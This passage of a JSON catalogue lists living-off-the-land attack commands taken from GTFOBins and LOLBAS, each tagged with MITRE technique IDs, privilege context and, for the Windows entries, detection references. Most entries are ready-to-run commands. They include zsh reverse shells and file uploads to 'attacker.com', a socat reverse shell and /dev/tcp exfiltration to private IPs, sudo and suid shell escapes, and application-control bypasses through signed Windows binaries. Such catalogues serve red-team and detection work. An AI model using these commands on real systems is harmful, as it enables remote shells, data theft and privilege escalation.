>/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:download:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(<&$REPLY)\" >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsh -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:1:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c '</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:1:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsh -c '</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-read:1:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsh -c '</path/to/input-file'","description":"This spawns a pager if run in a TTY.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-write:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-write:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:file-write:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"zsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:inherit:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:inherit:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:inherit:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"zsh -c '</etc/hosts'","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:reverse-shell:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:reverse-shell:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:reverse-shell:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;zsh >&$REPLY 2>&$REPLY 0>&$REPLY'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:shell:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:shell:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:shell:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"zsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:upload:0:sudo","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:upload:0:suid","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsh:upload:0:unprivileged","toolId":"gtfo:zsh","toolName":"zsh","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"zsh -c 'zmodload zsh/net/tcp;ztcp attacker.com 12345;echo -n \"$(</path/to/input-file)\" >&$REPLY'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsoelim:file-read:0:sudo","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zsoelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsoelim:file-read:0:suid","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/zsoelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zsoelim:file-read:0:unprivileged","toolId":"gtfo:zsoelim","toolName":"zsoelim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"zsoelim /path/to/input-file","description":"The content is actually parsed and corrupted by the command.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zsoelim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zypper:shell:0:sudo","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /usr/lib/zypper/commands/zypper-x\nzypper x","description":"The copy usually requires elevated privileges.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zypper/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zypper:shell:0:unprivileged","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /usr/lib/zypper/commands/zypper-x\nzypper x","description":"The copy usually requires elevated privileges.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zypper/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zypper:shell:1:sudo","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/zypper-x\nPATH=$PATH:/path/to/temp-dir/ zypper x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/zypper/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:zypper:shell:1:unprivileged","toolId":"gtfo:zypper","toolName":"zypper","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/zypper-x\nPATH=$PATH:/path/to/temp-dir/ zypper x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/zypper/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:addinutil-exe:0","toolId":"lolbas:addinutil-exe","toolName":"AddinUtil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe -AddinRoot:.","description":"AddinUtil is executed from the directory where the 'Addins.Store' payload exists, AddinUtil will execute the 'Addins.Store' payload.","usecase":"Proxy execution of malicious serialized payload","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddinUtil.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\AddInUtil.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\AddInUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml"}],"references":["https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html","https://lolbas-project.github.io/lolbas/Binaries/AddinUtil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:appinstaller-exe:0","toolId":"lolbas:appinstaller-exe","toolName":"AppInstaller.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"start ms-appinstaller://?source={REMOTEURL:.exe}","description":"AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml"}],"references":["https://twitter.com/notwhickey/status/1333900137232523264","https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:applaunch-exe:0","toolId":"lolbas:applaunch-exe","toolName":"Applaunch.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe\" /activate \"{REMOTEURL}#APPLICATION_METADATA_HERE\"","description":"Launches a ClickOnce application via `Applaunch.exe`. Bypasses SmartScreen and default AppLocker rules when the application is published as partial trust.","usecase":"Execute ClickOnce applications in environments where `dfsvc.exe` would normally enforce full-trust and SmartScreen checks. Can be abused as an AWL bypass in rare configurations.","mitre":["T1127.002"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Applaunch.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Applaunch.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Applaunch.exe rarely executes unless any ClickOnce partial trusted apps are used. Any use or invocation outside dfsvc.exe with `/activate` should be considered suspicious."}],"references":["https://nathan2.com/posts/clicktools","https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment","https://web.archive.org/web/20060913192623/http://blogs.msdn.com/shawnfa/archive/2005/11/30/498610.aspx","https://lolbas-project.github.io/lolbas/Binaries/Applaunch/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:aspnet-compiler-exe:0","toolId":"lolbas:aspnet-compiler-exe","toolName":"Aspnet_Compiler.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe -v none -p C:\\users\\cpl.internal\\desktop\\asptest\\ -f C:\\users\\cpl.internal\\desktop\\asptest\\none -u","description":"Execute C# code with the Build Provider and proper folder structure in place.","usecase":"Execute proxied payload with Microsoft signed binary to bypass application control solutions","mitre":["T1127"],"privilege":"user","fullPath":["c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe","c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml"}],"references":["https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/","https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8","https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:at-exe:0","toolId":"lolbas:at-exe","toolName":"At.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"C:\\Windows\\System32\\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su {CMD}","description":"Create a recurring task to execute every day at a specific time.","usecase":"Create a recurring task, to eg. to keep reverse shell session(s) alive","mitre":["T1053.002"],"privilege":"admin","fullPath":["C:\\WINDOWS\\System32\\At.exe","C:\\WINDOWS\\SysWOW64\\At.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/builtin/security/win_security_atsvc_task.yml"},{"type":"IOC","value":"C:\\Windows\\System32\\Tasks\\At1 (substitute 1 with subsequent number of at job)"},{"type":"IOC","value":"C:\\Windows\\Tasks\\At1.job"},{"type":"IOC","value":"Registry Key - Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\At1."}],"references":["https://freddiebarrsmith.com/at.txt","https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html","https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems","https://lolbas-project.github.io/lolbas/Binaries/At/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:atbroker-exe:0","toolId":"lolbas:atbroker-exe","toolName":"Atbroker.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ATBroker.exe /start malware","description":"Start a registered Assistive Technology (AT).","usecase":"Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Atbroker.exe","C:\\Windows\\SysWOW64\\Atbroker.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml"},{"type":"IOC","value":"Changes to HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration"},{"type":"IOC","value":"Changes to HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs"},{"type":"IOC","value":"Unknown AT starting C:\\Windows\\System32\\ATBroker.exe /start malware"}],"references":["http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/","https://lolbas-project.github.io/lolbas/Binaries/Atbroker/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bash-exe:0","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c \"{CMD}\"","description":"Executes executable from bash.exe","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bash-exe:1","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c \"socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane\"","description":"Executes a reverse shell","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bash-exe:2","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'","description":"Exfiltrate data","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bash-exe:3","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"AWL 